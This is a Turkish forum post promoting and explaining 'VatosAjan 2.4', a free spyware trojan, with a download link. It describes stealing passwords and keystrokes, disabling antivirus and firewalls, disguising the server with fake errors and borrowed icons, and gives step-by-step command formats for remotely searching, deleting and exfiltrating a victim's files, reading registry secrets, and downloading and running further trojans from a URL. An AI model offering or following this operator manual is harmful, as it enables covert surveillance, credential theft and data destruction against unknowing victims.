VatosAjan bulastigi bilgisayarin özelliklerini,kurbanin sifre ve keylog kayitlarini mailinize gönderen
Bünyesinde bulunan FTP Server ile kurbanin bilgisayarina baglanilabilen,Sadece VatosAjan'da bulunan
WEB KONTROL özelligi ile router veya direk baglanti farketmeksizin kurbanin bilgisayarinda
dosya arama,dosya silme,istediginiz dosyalari mailinize gönderme,
downloader gibi calisip, istediginiz dosyalari internetten indirip calistirabilme,
mail adresinizi degistirebilme,registry kayitlarina ulasabilme ve kendisini silme emirlerini
uygulayabilecek interaktif bir casus yazilimdir.
VatosAjanin alabildigi sifreler asagida yazilmistir.
Versiyon Farklari
-Win9x sistemlerde stabil calismasi saglandi
-FTP Server eklendi
-Server ve serverin kullandigi dosyalar disk üzerinde gizlendi
-Server Boyutunun kücülmesi amaciyla kullanilan componentler degistirildi
-Firewall ve Antivüslerin kapatilmasi saglandi
-Web Kontrol icin firewall By Pass edildi
-Servere ayar isleme yöntemi degistirildi
-Serverin baska bir dosya ile birlesince simgesinin korunmasi saglandi
-İlk calistirilma esnasinda sahte hata uyarisi verebilme özelligi eklendi
-icon secim yöntemi degistirildi.Böylece kendi iconlarinizi da kullanabileceksiniz.
-Server Uzantisini degistirebilme imkani eklendi
-Client görünümü ve logo degistirildi
-Türkce ve İngilizce Dil Secenegi eklendi
VatosAjanin en Can alici özelligi olan Web Kontrol Kullanimi:
su anda VatosAjan'a 7 adet emir verebilirsiniz.
Emir verebilmek icin kurbanin bilgisayar adi ile (gelen maillerde Bilgisayar adi yaziyor)
bir *.txt dosya olusturun.(örnek:Bilgisayar Adi vatos ise oluturacaginiz dosyanin adi vatos.txt olacak.)
simdi server olustururken yazdigimiz web sitenize upload edin bu txt dosyayi
web site adresiniz http://www.sizinsiteniz.com/kontrol/ olsun kurbanin pc adi.txt(örnek: vatos.txt) dosyasini
gönderdiginizde adresi söyle olmali
http://www.sizinsiteniz.com/kontrol/vatos.txt
VatosAjan 4 dakikada bir emir kontrolü yapar, yeni emrinizi görürse hemen vazifeye baslar.
simdi gelelim ajanimiza yaptirabileceklerinize:
Emirler:
1)Ara:serverin bulundugu pc de istediginiz uzantidaki dosyalari arar ve listesini
mail adresinize yollar.Kullanimi:
1. satira ara (yani emrimiz.)
2.satira arayacaginiz dosya uzantisi örnek:*.xls
Yani vatos.txt dosyamiz su sekilde olacak
örnek kullanim
ara
*.xls
2)Dosyasil:Kurbanin bilgisayarindan tam yolunu verdiginiz dosyayi siler.Yine kurbaninPcAdi.txt dosyasini
webe gönderin.Tüm emirler icin bu islem yapilacak zaten...
1.satira dosyasil (yani emrimiz.)
Alt satirlara ise silinmesini istediginiz dosyalarin tam dizinini yaziniz.
örnek kullanim
dosyasil
c:\belgelerim\resim.jpg
c:\belgelerim\ozel.xls
d:\sirket\hesaplar.xls
d:\dosyalar\program.exe
3)Gönder:İste webden kontrolün en can alici yani.Kurbanin bilgisayarindaki istediginiz dosyalari
mailinize göndermesini saglayabilirsiniz
1.satira gonder (yani emrimiz.)
Alt satirlara ise gelmesini istediginiz dosyalarin kurbanin bilgisayarindaki tam yollarini yazacaksiniz.
Anlayacaginiz üzere birden fazla dosya isteyebilirsiniz.
örnek Kullanim
gonder
c:\belgelerim\resim.jpg
c:\belgelerim\ozel.xls
d:\sirket\hesaplar.xls
d:\dosyalar\program.exe
4)IndirVeCalistir: Ajanimiz remote downloader olarak da görev yapabiliyor.Kurbani sevdiniz ve bir de trojan yüklemeye
karar verdiniz.VatosAjana dosyanin yerini söyleyin yeter
txt dosyamiza
1.satira IndirVeCalistir (yani emrimiz.)
2.satira yükleyeceginiz dosyanin web adresi
örnek Kullanim
IndirVeCalistir
http://members.lycos.co.uk/vatosajan/VatosAjan.exe
5)Kendinisil:Kurbandan gelen mailler ilginizi cekmiyorsa veya artik isinizin bittigini düsünüyorsaniz VatosAjan'a
emir verin kendini imha etsin.
örnek Kullanim
kendinisil
6)Mail:Mail emri ile serverde kayitli mail adresinizi degistirebilirsiniz.
txt dosyamiza
1. satira mail (yani emir)
2.Satira mail adresiniz
örnek Kullanim
mail
vatosajan@yahoo.com
7)Registry:Bu emri özellikle bilgi düzeyi yüksek arkadaslar icin tasarladim.Bu emir ile istediginiz registry
bilgilerine kolaylikla ulasabileceksiniz.Ne amacla kullanilabilecegi hususunda
bir kac örnek vermek istiyorum. örnek 1: Kurbaniniz DelphiTürk Codebank kullaniyorsa kullanici adi ve sifresini cok kolay bir sekilde alabilirsiniz.
Tek bilmeniz gereken registry de hangi anahtarda oldugu.
örnek 2: Kurbaninizin Baska bir trojan serveri daha yedigini anladiniz.O trojanin server sifresinin kayitli
oldugu anahtara bakarak sifreyi dolayisiyla da serveri ele gecirebilirsiniz.
örnek 3:Otomatik Baslayan programlarin isimlerini alabilirsiniz.
örnek 4:İlginizi ceken ücretli Programlarin lisans numaralarini alabilirsiniz.
Sanirim bu kadar örnek yeter.Sira geldi kullanimini aciklamaya.
txt dosyamiza
1. satira registry (yani emir)
2. satira rootkey adi (mesela: HKEY_LOCAL_MACHINE)
3. satira bilgileri görmek istediginiz registry anahtarinin adi,
örnek Kullanim
registry
HKEY_LOCAL_MACHINE
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
örnek kullanim icin dosyalar VatosAjan.zip icerisinde bulunmaktadir.
ücretsizdir.
Download adresi:
http://www.websamba.com/vatosajan/VatosAjan.zip
VatosAjan 2.4 Hakkinda;
- PeeRLeeSS
- Megabyte1
- Mesajlar: 928
- Kayıt: 15 Mar 2006, 18:12
- İletişim: